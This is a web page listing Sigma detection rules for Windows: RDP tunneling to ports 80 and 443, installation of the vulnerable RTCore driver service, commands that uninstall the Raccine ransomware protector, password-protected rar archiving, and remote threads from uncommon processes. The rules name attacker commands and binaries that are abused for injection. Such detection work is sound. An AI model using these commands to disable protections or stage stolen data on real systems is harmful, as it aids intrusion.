Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
status test author Florian Roth (Nextron Systems) ATT&CK sub-technique id b1e5da3b-ca8e-4adf-915c-9921f3d85481
view Sigma YAML
title: RDP to HTTP or HTTPS Target Ports
id: b1e5da3b-ca8e-4adf-915c-9921f3d85481
status: test
description: Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
references:
    - https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg
    - https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling
author: Florian Roth (Nextron Systems)
date: 2022-04-29
modified: 2022-07-14
tags:
    - attack.command-and-control
    - attack.t1572
    - attack.lateral-movement
    - attack.t1021.001
    - car.2013-07-002
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Image|endswith: '\svchost.exe'
        Initiated: 'true'
        SourcePort: 3389
        DestinationPort:
            - 80
            - 443
    condition: selection
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Moderate Low FP
RTCore Suspicious Service Installation
Detects the installation of the RTCore service, which could indicate abuse of the vulnerable Micro-Star MSI Afterburner driver
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id 91c49341-e2ef-40c0-ac45-49ec5c3fe26c
view Sigma YAML
title: RTCore Suspicious Service Installation
id: 91c49341-e2ef-40c0-ac45-49ec5c3fe26c
status: test
description: Detects the installation of the RTCore service, which could indicate abuse of the vulnerable Micro-Star MSI Afterburner driver
references:
    - https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-30
tags:
    - attack.persistence
logsource:
    product: windows
    service: system
detection:
    selection:
        Provider_Name: 'Service Control Manager'
        EventID: 7045
        ServiceName: 'RTCore64'
    condition: selection
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Strong Medium FP
Raccine Uninstall
Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.
status test author Florian Roth (Nextron Systems) ATT&CK technique id a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc
view Sigma YAML
title: Raccine Uninstall
id: a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc
status: test
description: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.
references:
    - https://github.com/Neo23x0/Raccine
author: Florian Roth (Nextron Systems)
date: 2021-01-21
modified: 2022-10-09
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    category: process_creation
    product: windows
detection:
    selection1:
        CommandLine|contains|all:
            - 'taskkill '
            - 'RaccineSettings.exe'
    selection2:
        CommandLine|contains|all:
            - 'reg.exe'
            - 'delete'
            - 'Raccine Tray'
    selection3:
        CommandLine|contains|all:
            - 'schtasks'
            - '/DELETE'
            - 'Raccine Rules Updater'
    condition: 1 of selection*
falsepositives:
    - Legitimate deinstallation by administrative staff
level: high
Convert to SIEM query
high Strong Medium FP
Rar Usage with Password and Compression Level
Detects the use of rar.exe on the command line to create an archive with password protection (-hp) together with either a compression level (-m) or the archive add command (a). This combination is often indicative of malicious activity.
status test author @ROxPinTeddy ATT&CK sub-technique id faa48cae-6b25-4f00-a094-08947fef582f
view Sigma YAML
title: Rar Usage with Password and Compression Level
id: faa48cae-6b25-4f00-a094-08947fef582f
status: test
description: Detects the use of rar.exe on the command line to create an archive with password protection (-hp) together with either a compression level (-m) or the archive add command (a). This combination is often indicative of malicious activity.
references:
    - https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/
    - https://ss64.com/bash/rar.html
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md
author: '@ROxPinTeddy'
date: 2020-05-12
modified: 2022-03-16
tags:
    - attack.collection
    - attack.t1560.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_password:
        CommandLine|contains: ' -hp'
    selection_other:
        CommandLine|contains:
            - ' -m'
            - ' a '
    condition: selection_password and selection_other
falsepositives:
    - Legitimate use of Winrar command line version
    - Other command line tools, that use these flags
level: high
Convert to SIEM query
high Strong Medium FP
Rare Remote Thread Creation By Uncommon Source Image
Detects uncommon processes creating remote threads.
status test author Perez Diego (@darkquassar), oscd.community ATT&CK technique id 02d1d718-dd13-41af-989d-ea85c7fab93f
view Sigma YAML
title: Rare Remote Thread Creation By Uncommon Source Image
id: 02d1d718-dd13-41af-989d-ea85c7fab93f
related:
    - id: 66d31e5f-52d6-40a4-9615-002d3789a119
      type: derived
status: test
description: Detects uncommon processes creating remote threads.
references:
    - Personal research, statistical analysis
    - https://lolbas-project.github.io
author: Perez Diego (@darkquassar), oscd.community
date: 2019-10-27
modified: 2025-12-08
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
logsource:
    product: windows
    category: create_remote_thread
detection:
    selection:
        SourceImage|endswith:
            - '\bash.exe'
            - '\cscript.exe'
            - '\cvtres.exe'
            - '\defrag.exe'
            - '\dialer.exe'
            - '\dnx.exe'
            - '\esentutl.exe'
            - '\excel.exe'
            - '\expand.exe'
            - '\find.exe'
            - '\findstr.exe'
            - '\forfiles.exe'
            - '\gpupdate.exe'
            - '\hh.exe'
            - '\installutil.exe'
            - '\lync.exe'
            - '\makecab.exe'
            - '\mDNSResponder.exe'
            - '\monitoringhost.exe' # Loads .NET CLR by default and thus a favorite for process injection for .NET in-memory offensive tools.
            - '\msbuild.exe'
            - '\mshta.exe'
            - '\mspaint.exe'
            - '\outlook.exe'
            - '\ping.exe'
            - '\provtool.exe'
            - '\python.exe'
            - '\regsvr32.exe'
            - '\robocopy.exe'
            - '\runonce.exe'
            - '\sapcimc.exe'
            - '\smartscreen.exe'
            - '\spoolsv.exe'
            - '\tstheme.exe'
            - '\userinit.exe'
            - '\vssadmin.exe'
            - '\vssvc.exe'
            - '\w3wp.exe'
            - '\winscp.exe'
            - '\winword.exe'
            - '\wmic.exe'
            - '\wscript.exe'
    filter_main_conhost:
        SourceImage:
            - 'C:\Windows\System32\Defrag.exe'
            - 'C:\Windows\System32\makecab.exe'
        TargetImage: 'C:\Windows\System32\conhost.exe'
    filter_main_provtol_svchost:
        SourceImage: 'C:\Windows\System32\provtool.exe'
        TargetImage: 'C:\Windows\System32\svchost.exe'
    filter_main_provtool_system:
        SourceImage: 'C:\Windows\System32\provtool.exe'
        TargetImage: 'System'
    filter_main_userinit:
        SourceImage: 'C:\Windows\System32\userinit.exe'
        TargetImage: 'C:\Windows\explorer.exe'
    filter_main_winword:
        SourceImage|endswith: '\WINWORD.EXE'
        TargetImage|startswith:
            - 'C:\Program Files (x86)\' # C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            - 'C:\Program Files\' # C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\AI\ai.exe
    filter_main_ms_office:
        # Raised by following issue: https://github.com/SigmaHQ/sigma/issues/5529
        SourceImage|startswith:
            - 'C:\Program Files\Microsoft Office\'
            - 'C:\Program Files (x86)\Microsoft Office\'
        TargetImage: 'System'
    filter_optional_explorer_vmtools:
        SourceImage|endswith: '\SysWOW64\explorer.exe'
        TargetImage:
            - 'C:\Program Files (x86)\VMware\VMware Tools\vmtoolsd.exe'
            - 'C:\Program Files\VMware\VMware Tools\vmtoolsd.exe'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - This rule is best put in testing first in order to create a baseline that reflects the data in your environment.
level: high
Convert to SIEM query
Showing 1251-1300 of 3,750